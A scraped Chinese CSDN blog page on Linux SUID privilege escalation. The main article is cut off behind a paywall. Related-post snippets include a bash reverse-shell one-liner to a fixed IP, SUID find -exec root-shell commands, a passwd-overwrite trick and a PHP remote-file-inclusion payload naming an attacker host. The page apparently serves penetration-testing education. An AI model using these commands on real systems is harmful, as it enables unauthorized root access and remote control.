操作系统权限提升(十九)之Linux提权-SUID提权

最新推荐文章于 2025-02-07 14:16:54 发布
最新推荐文章于 2025-02-07 14:16:54 发布
阅读量2.2k 收藏 15
点赞数 2
CC 4.0 BY-SA版权
分类专栏: 操作系统权限提升 文章标签: linux bash 安全 网络安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64973687/article/details/129269496
本文详细介绍了Linux中的SUID权限,包括SUID原理、查找SUID文件的方法以及利用FIND、BASH、VIM和PYTHON进行提权的实验过程,通过实战模拟展示了如何在获得普通用户权限后,通过SUID提权获取root权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

系列文章

操作系统权限提升(十八)之Linux提权-内核提权

SUID提权

SUID介绍

SUID是一种特殊权限,设置了suid的程序文件,在用户执行该程序时,用户的权限是该程序文件属主的权限,例如程序文件的属主是root,那么执行该程序的用户就将暂时获得root账户的权限。sgid与suid类似,只是执行程序时获得的是文件属组的权限。passwd这个命令程序的权限设置,它就是设置了suid权限的

在这里插入图片描述
注意以下几点:

  1. 只有可以执行的二进制程序文件才能设定SUID权限,非二进制文件设置SUID权限没任何意义.
  2. 命令执行者要对该程序文件拥有执行(x)权限.
  3. 命令执行者在执行该程序时获得该程序文件属主的身份.
  4. SUID权限只在该程序执行过程中有效,也就是说身份改变只在程序执行过程中有效

设置SUID

了解本专栏 订阅专栏 解锁全文
操作系统权限提升(二十)Linux-计划任务
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-28 1220
先准备一个SUID文件或者限为xx7的文件,让低限的用户可以执行文件的修改,在这里我们我们准备一个sh文件或者python文件都可以,我们写一个linux运维脚本,来监控当前电脑的运行参数。linux计划任务是因为限配置不当,计划任务以root限运行,低限的用户可以修改计划任务的文件,从而被攻击者利用,导致Linux计划任务命令如下。linux文件第一部分是该文件的拥有者所拥有的限,第二部分是该文件所在用户组的用户所拥有的限,最后一部分是其他用户所拥有的限。
操作系统权限提升(二十三)Linux-通配符(ws)
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-01 1167
接下来查看文件里面的内容,发现文件1和文件2都可以查看,但是–help查看不了,直接调出了–help的命令,这种类型的技巧称为Wildcard wildness。一般都有备份网站的习惯,那么运维人员或管理员填写了备份文件的计划任务任务,如果滥用了通配符,就可能导致。如果有的命令的参数中可以去执行linux命令,我们进行劫持,达到的目的,我们以tar命令为例子。可以对后面的命令进行劫持 ,只需要要编写一个这样的参数文件就行可以了。查看计划任务,发现有滥用通配符的,并且是root限,可以进行
find命令以及反弹shell复现
热门推荐
qq_40898302的博客
04-21 1万+
关于linux系统的find命令复现
SUIDfind配置不当)
ljj20020718的博客
07-19 403
备份passwd文件,使用openssl passwd生成一个密码,再使用python搭建一个http服务,然后使用本地物理机下载passwd备份文件。在本地使用python开启http服务并将passwd备份文件放到该目录下,使用wget -0下载该备份文件并覆盖原有的passwd文件。suid限解释:当文件被设置了suid限后表示该文件被执行时会将当前的用户限暂时切换为文件所有者的限(所有者一般为root)发现find命令,使用find-exec参数将wget命令也增加suid限。
Linux:SUID
Elite的博客
03-05 3051
find命令为例,讲解SUID原理
LinuxSUID
CP1024的博客
04-04 4124
LinuxSUID SUID 1. SUID限只能设置二进制文件 2. 命令执行者要有二进制文件的执行 3. 命令执行者执行二进制文件时会获得该程序的属主身份 4. SUID限只在程序执行中有效 即如果root给一个程序赋予了SUID限,则普通用户在执行该程序过程中,是root限 cp命令 以cp为例,这里给cp添加SUID限做测试,拥有SUID限的程序会由rwx变成rws 也可以通过find / -perm -u=s -type f 2>dev/null命令来
Linux系统将普通用户权限提升
qq_42181775的博客
09-05 1268
su xxx用户名命令1:查看当前用户名命令2:查看sudoers文件的限命令3:将etc/sudoers文件限,修改为可读写。命令4:vim打开etc/sudoers文件,将普通用户写入到红线处。
权限提升-linux手法总结
01-14
### 权限提升-linux手法总结 #### 1. Linux概述 在Linux系统中,限管理是一项至关重要的安全措施。用户被赋予不同级别的限来访问系统资源和服务。然而,在某些情况下,攻击者可能会试图通过各种手段来...
[权限提升] Linux & 维持 — 系统错误配置 - SUID 文件
Blue17 の 小窝
02-07 1255
例如假设一个程序文件的属主是 root,且该程序文件被赋予了 SUID 属性,那么当其它用户执行该程序文件时,就会以 root 用户的限进行执行。如果该程序被赋予了 SUID 限,且程序拥有人是 Root,则代表用户在执行 Python 代码时都是以 Root 限执行的,很容易造成。通过上面的操作,我们发现了靶机中存在 SUID 的可能,只不过命令是 VIM(这个是笔者故意找罪受的)。是 Linux 系统中的一个编辑文件的命令,若该命令被赋予了 SUID 限,攻击者可以通过修改。
LinuxFind命令也能方式一文通透
weixin_51725318的博客
11-25 1764
LinuxFind命令也能方式一文通透
网安学途—SUID教程
星虐
11-18 2072
本文介绍了SUID的基本概念、如何设置SUID限,以及常见的具有SUID限的二进制可执行文件(如nmap、vim、findbash等)。此外,文章详细阐述了如何利用这些文件进行操作,包括使用find、nmap、more、less、bash、vim、awk和cp等命令的具体方法。最后,文章还对比了/bin/bash和/bin/sh的区别,指出Bash功能更强大,而/bin/sh可能是Bash或其他Shell的符号链接。
linux限,权限提升
weixin_29147589的博客
05-07 611
毕业了,想留的人没能留住,想要的生活也没有如约而至,也就这样了。。。---- 网易云热评一、基于WebShell的1、访问大马,查看限http://192.168.1.147/dm.asp2、如果遇到拒绝访问什么可以上传一个aspx的大马,这个限比较大http://192.168.1.147/da.aspx二、window1、查看系统打补丁情况win2003:systeminfo&g...
Linux利用Suid实验
qq_45813384的博客
02-20 1340
普通用户在执行特殊的Suid命令的时候(如:find、vim、less、more等),命令会自动申请管理员限,并以管理员的限去执行命令,当用户在这种拥有可以再执行命令的命令下(如:vim)执行特殊命令(如:!find 当前目录下的文件 -execbash-i >& /dev/tcp/192.168.0.105/8529 0>&1。bash-i >& /dev/tcp/192.168.0.105/2323 0>&1//反弹shell命令。ln-s-fbash /bin/sh //修改成bash
小记 SUID find
crispr的博客
01-29 6236
find 姿势一 find / -perm -g=s -type f 2>/dev/null find . -exec /bin/sh -p \; -quit 姿势二 touch getshell find / -type f -name getshell -exec "whoami" \; find / -type f -name getshell -exec "/bin/sh" \...
Linux文件特殊限:SUID、SGID、SBIT
Thewei666的博客
02-14 2817
我们从上图中可以发现除了rwx这三个限以外,还有s跟t这两个限,这两个限的意义与系统的账号和系统的进程管理较为相关。
Suidfind靶机渗透实战
PANDA墨森的博客
07-11 1640
这是vulnhub靶机系列文章的第十一篇,本次主要知识点为:drupal漏洞利用,suidfind命令 靶机下载地址:https://www.vulnhub.com/entry/dc-1-1,292/ 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13229881.html #001 实验环境 攻击机:kali :192.168.136.129 靶机:192.168.136.136 #002 寻找靶机ip Kali下使用netdisco..
Linux被曝出SUDO漏洞,幸好影响不大
NOSEC2019的博客
10-15 2499
近期,有安全人员发现了Linux sudo命令中的一个安全漏洞,可让普通用户以root限执行命令。但值得庆幸的是,这个漏洞只能在非标准配置的Linux下生效,大多数Linux服务器不受影响。 在我们开始讨论这个漏洞前,有一些关于sudo命令的工作原理以及相关设置是需要去了解的。 当在Linux操作系统上执行命令时,只有得到许可或者知道root密码,普通用户才可以使用sudo(super use...
深度分析linuxSUID|Find|NMAP|VIM...
qq_60115503的博客
05-07 3134
SUID是Set User ID,SGID是Set Group的意思 SUID是一种特殊限,设置了suid的程序文件,在用户执行该程序时,用户的限是该程序文件属主的限,例如程序文件的属主是root,那么执行该程序的用户就将暂时获得root账户的限,SGID与SUID相似,只是执行程序时获得的是文件属组的
最新发布
03-08
### 技术概述 是指攻击者通过利用系统的某些弱点,将其限从较低级别升到较高级别的过程。这种行为可以让威胁行为者获得超越其原始授范围的操作能力[^2]。 #### 纵向 vs 横向 纵向指的是低限角色获取更高层次的角色限的过程;而横向则是指在同一级别的不同实体之间转移控制的行为。对于大多数安全事件而言,更值得关注的是纵向,因为它能够赋予攻击者更多的控制系统的能力。 #### 类型划分 根据目标平台的不同,可以分为两大类: - **操作系统**:涉及对底层OS机制的操纵,比如利用内核漏洞或不恰当的文件/注册表项限设置等问题来实现限升级。这类攻击通常会尝试将普通用户的高至管理员甚至系统级特状态。 - **应用程序**:专注于针对特定软件产品的缺陷实施攻击策略,例如SQL注入、跨站脚本(XSS)等编程错误所造成的安全隐患。成功后可能会让入侵者接管整个应用服务乃至背后的数据存储设施[^3]。 ### 实现方法举例 以下是几种常见的手段及其具体应用场景描述: #### 利用未修复的安全漏洞 当存在未经修补的已知问题时——无论是操作系统还是第三方组件中的——都可能成为潜在突破口。以Linux为例,在某些版本里如果启用了`eBPF`特性却未能妥善处理边界条件,则允许非特进程创建特制字节码从而绕过正常保护措施并最终取得root身份[CVE-2017-16995][^5]。 ```bash # 假设当前环境满足上述前条件下... $ gcc exploit.c -o exploit # 编译含有恶意逻辑源代码 $ ./exploit # 执行生成二进制文件完成动作 ``` 请注意这只是一个理论性的说明框架,并不代表实际可用工具! #### 文件系统滥用 另一个典型场景是在Windows平台上借助于路径遍历技巧或是DLL预加载顺序篡改等方式达成目的。假设某处程序依赖外部库加载但又缺乏严格的身份验证流程的话,那么就有可能被诱导去调用由黑客事先准备好的伪造副本进而打开通往深层资源的大门[^1]。 ```powershell # PowerShell下模拟非法命令执行情景 PS C:\> $env:PATH += ";C:\malicious\dir" PS C:\> some_vulnerable_app.exe # 此app会在启动期间自动寻找指定名称下的动态链接库 ``` 同样地,以上仅为示意性质而非真实案例重现指南。 #### 远程文件包含(RFI) 最后及一种较为隐蔽但也相当危险的情形即远程文件包含(Remote File Inclusion)。它主要发生在Web服务器端解析PHP之类的解释型语言过程中遇到类似`${@include('http://attacker.com/shell.php')}`这样的语句结构之时。只要能迫使受害者站点按照指示拉取远端恶意脚本内容便足以造成严重后果了。 ```php <?php include($_GET['file']); ?> <!-- 不加过滤直接使用用户输入作为参数 --> <!-- 攻击方构造请求 http://victim-site/?file=http://evil-server/payload.txt? --> ``` 尽管这里给出了一些基本概念和技术细节方面的介绍,但在现实世界中从事此类活动显然是违法且违背道德准则的做法。因此强烈建议读者仅把学到的知识用于合法合规的目的范围内,如强化自身防护意识或者参与官方许可内的渗透测试项目之中。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怰月

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值